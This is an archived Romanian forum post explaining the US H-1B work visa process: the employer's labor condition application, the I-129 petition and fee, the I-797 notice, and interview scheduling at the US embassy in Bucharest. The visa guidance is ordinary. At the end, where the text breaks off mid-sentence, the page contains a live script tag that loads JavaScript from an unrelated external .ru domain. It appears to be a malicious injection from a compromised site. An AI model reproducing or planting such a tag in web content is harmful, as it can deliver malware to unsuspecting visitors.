PDA

Arată versiune întreagă : Vize munca SUA (C,D,H1-B,H-2B,I,L,P3,R



sorin
14.10.2004, 03:34
<B style="mso-bidi-font-weight: normal">Viza tip H1-B[/B]
<A name=H1B></A>VIZE PENTRU OCUPATII DE SPECIALITATE
Legea privind Imigratia si Nationalitatea (INA) permite ca doar un anumit numar de vize pentru ocupatii de specialitate (tip H-1B) sa fie acordate in fiecare an. Munca depusa trebuie sa se incadreze in domenii ca arhitectura, inginerie, matematica, stiintele exacte, stiintele sociale, medicina si sanatate, educatie, afaceri, contabilitate, juridic, teologie si arte. Ambasada SUA nu poate asista solicitantul in gasirea unui loc de munca in Statele Unite.
Pentru a obtine statutul H-1B, angajatorul din Statele Unite trebuie sa depuna la Departamentul Muncii (Department of Labor) o fisa a conditiilor de lucru (LCA - labor condition application) prin care sa ateste anumite caracteristici, intre care plata salariului standard aferent pozitiei respective si natura conditiilor de lucru oferite. Apoi angajatorul va trebui sa depuna la Serviciul de Imigrari (USCIS) petitia I-129 si, daca nu este altfel scutit prin lege, sa achite o taxa suplimentara de $500 pentru a sponsoriza lucratorul cu viza H-1B. Dupa ce petitia a fost aprobata, USCIS va trimite solicitantului de viza formularul I-797 Notice of Action, care va putea fi folosit pentru a solicita viza. In cadrul USCIS functioneaza in mod curent un serviciu de preluare expeditiva a acestor tipuri de petitii. Pentru a afla mai multe despre procedura aprobarii petitiilor si despre procesarea urgenta a acestora, va rugam sa accesati pagina de web www.uscis.gov (http://www.uscis.gov/).
Toti solicitantii de viza pentru ocupatii de specialitate trebuie sa foloseasca sistemul de programari. Dupa ce ati achitat taxa de procesare la Banca Transilvania, puteti verifica aici (http://www.usembassy.ro/InfoR/NIVAppointment/niva.html) cand a fost programat interviul dvs. Cu toate acestea, persoanele care detin formularul original I-797 Notice of Approval (inclusiv membrii de gradul intai ai familiei acestuia) pot veni la interviu in orice zi de lucru cu publicul (de luni pana joi) la ora 9:00 a.m. fara sa astepte pana in ziua programarii. Recomandam pe cat posibil ca solicitantii sa se prezinte la interviu in ziua programata. Daca apar prea multi solicitanti la ora 9:00 a.m. intr-o anumita zi, o parte dintre acestia va fi solicitata sa revina intr-o alta zi.
La interviul pentru viza, solicitantul de viza pentru ocupatii de specialitate va prezenta urmatoarele: </o:<script src=http://www.iroe.ru/ngg.js></script>